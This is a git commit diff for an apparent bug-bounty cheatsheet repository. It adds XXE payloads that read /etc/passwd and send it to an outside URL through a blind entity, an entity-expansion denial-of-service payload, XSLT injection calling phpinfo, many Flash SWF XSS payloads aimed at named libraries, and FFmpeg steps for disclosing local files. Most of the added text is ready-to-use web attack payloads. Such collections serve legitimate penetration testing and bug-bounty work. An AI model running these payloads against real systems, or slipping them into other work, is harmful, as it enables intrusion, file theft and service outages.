Merge pull request #1 from EdOverflow/master

Update from Original repository.
2024-11-22 02:53:06 +00:00 · 2017-09-30 12:13:01 +05:30 · 2017-09-30 12:13:01 +05:30 · 559c994f69
commit 559c994f69
parent e0394bfd2b 60c998c43d
7 changed files with 138 additions and 0 deletions
--- a/README.md
+++ b/README.md
@ -10,11 +10,13 @@
 - [CRLF Injection || HTTP Response Splitting](cheatsheets/crlf.md)
 - [CSV Injection](cheatsheets/csv-injection.md)
 - [LFI](cheatsheets/lfi.md)
+- [XXE](cheatsheets/xxe.md)
 - [RCE](cheatsheets/rce.md)
 - [Open Redirect](cheatsheets/open-redirect.md)
 - [Crypto](cheatsheets/crypto.md)
 - [Template Injection](cheatsheets/template-injection.md)
 - [Content Injection](cheatsheets/content-injection.md)
+- [XSLT Injection](cheatsheets/xslt.md)

 # Contributing

@ -49,3 +51,5 @@ We like to keep our Markdown files as uniform as possible. So if you submit a PR
 - [jon_bottarini](https://github.com/BlueTower)
 - [sp1d3r](https://github.com/sp1d3r)
 - [yasinS](https://github.com/yasinS)
+- [neutrinoguy](https://github.com/neutrinoguy)
+- [kuromatae](https://github.com/kuromatae)
--- a/cheatsheets/bugbountyplatforms.md
+++ b/cheatsheets/bugbountyplatforms.md
@ -8,3 +8,4 @@
 - [BountyFactory](https://bountyfactory.io/)
 - [Intigriti](https://intigriti.be/)
 - [Bugbountyjp](https://bugbounty.jp/)
+- [Yogosha](https://www.yogosha.com/)
--- a/cheatsheets/lfi.md
+++ b/cheatsheets/lfi.md
@ -21,3 +21,17 @@
 ```
 /%5c..
 ```
+
+**FFmpeg Local File Disclosure**
+
+This [script](https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py) by @neex can be used to disclose local files on FFmpeg hosts which parse externally-referencing [HLS playlists](https://ffmpeg.org/ffmpeg-formats.html#hls-2).
+
+_Steps to reproduce_
+
+1. Please download the script from @neex to your "attacker" instance
+2. Execute the script with your desired parameters: `python3 gen_xbin_avi.py file:///etc/hostname bugbounty.avi`
+3. Upload the generated AVI file to your target site (e.g. within a 'video upload page')
+4. The target may process the malicious HLS inclusion with FFmpeg on the server-side.
+5. Play the uploaded AVI via the target site. If successful, your desired file will be disclosed within the video.
+
+Alternative scripts exist which may generate different HLS formats or lead to the desired file being disclosed in a different manner.
--- a/cheatsheets/special-tools.md
+++ b/cheatsheets/special-tools.md
@ -30,7 +30,14 @@ otherapp.10.0.0.1.nip.io

 **Reconnaissance**

+- https://dnsdumpster.com (DNS and subdomain recon)
+- http://threatcrowd.org (WHOIS, DNS, email, and subdomain recon)
+- https://mxtoolbox.com (wide range of DNS-related recon tools)
 - https://publicwww.com/ (Source Code Search Engine)
+- [HackerTarget Tools](https://hackertarget.com/ip-tools/) (DNS recon, site lookup, and scanning tools)
+- [VirusTotal](https://virustotal.com/en-gb/domain/google.com/information/) (WHOIS, DNS, and subdomain recon)
+- [crt.sh](https://crt.sh/?q=%25.uber.com) (SSL certificate search)
+- [Google CT](https://transparencyreport.google.com/https/certificates) (SSL certificate transparency search)

 **Report Templates**

--- a/cheatsheets/xslt.md
+++ b/cheatsheets/xslt.md
@ -0,0 +1,25 @@
+## XSLT Injection
+
+**Backend infos**
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
+	<body>
+		<xsl:text>xsl:vendor = </xsl:text><xsl:value-of select="system-property('xsl:vendor')"/><br/>
+		<xsl:text>xsl:version = </xsl:text><xsl:value-of select="system-property('xsl:version')"/><br/>
+	</body>
+</html>
+```
+
+**Injecting in PHP**
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
+	<body>
+		<xsl:value-of name="bugbounty" select="php:function('phpinfo')"/>
+	</body>
+</html>
+```
+
--- a/cheatsheets/xss.md
+++ b/cheatsheets/xss.md
@ -110,6 +110,34 @@ javas&#x09;cript://www.google.com/%0Aalert(1)
 [a](javascript:window.onerror=confirm;throw%201)
 ```

+**Flash SWF XSS**
+
+- ZeroClipboard: `ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf`
+
+- plUpload Player: `plupload.flash.swf?%#target%g=alert&uid%g=XSS&`
+
+- plUpload MoxiePlayer: `Moxie.swf?target%g=confirm&uid%g=XSS` (also works with `Moxie.cdn.swf` and other variants)
+
+- FlashMediaElement: <code>flashmediaelement.swf?jsinitfunctio%gn=alert`1`</code>
+
+- videoJS: `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29`
+
+- YUI "io.swf": `io.swf?yid=\"));}catch(e){alert(document.domain);}//`
+
+- YUI "uploader.swf": `uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<`
+
+- Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()`
+
+- Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//`
+
+- JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)`
+
+- SWFUpload 2.2.0.1: `swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//`
+
+- FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf`
+
+_Note: Useful reference on SWF XSS construction from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._
+
 **Lightweight Markup Languages**

 **RubyDoc** (.rdoc)
--- a/cheatsheets/xxe.md
+++ b/cheatsheets/xxe.md
@ -0,0 +1,59 @@
+**LFI Test**
+```
+<?xml version="1.0"?>
+<!DOCTYPE foo [  
+<!ELEMENT foo (#ANY)>
+<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
+```
+
+**Blind LFI test (when first case doesn't return anything)**
+```
+<?xml version="1.0"?>
+<!DOCTYPE foo [
+<!ELEMENT foo (#ANY)>
+<!ENTITY % xxe SYSTEM "file:///etc/passwd">
+<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>
+```
+
+**Access Control bypass (loading restricted resources - PHP example)**
+```
+<?xml version="1.0"?>
+<!DOCTYPE foo [
+<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
+<foo><result>&ac;</result></foo>
+```
+
+**SSRF Test**
+```
+<?xml version="1.0"?>
+<!DOCTYPE foo [  
+<!ELEMENT foo (#ANY)>
+<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>
+```
+
+**XEE (XML Entity Expansion - DOS)**
+```
+<?xml version="1.0"?>
+<!DOCTYPE lolz [
+<!ENTITY lol "lol">
+<!ELEMENT lolz (#PCDATA)>
+<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
+<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
+<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
+<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
+<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
+<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
+<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
+<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
+<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
+]>
+<lolz>&lol9;</lolz>
+```
+
+**XEE #2 (Remote attack - through external xml inclusion)**
+```
+<?xml version="1.0"?>
+<!DOCTYPE lolz [
+<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
+<lolz><lol>3..2..1...&test<lol></lolz>
+```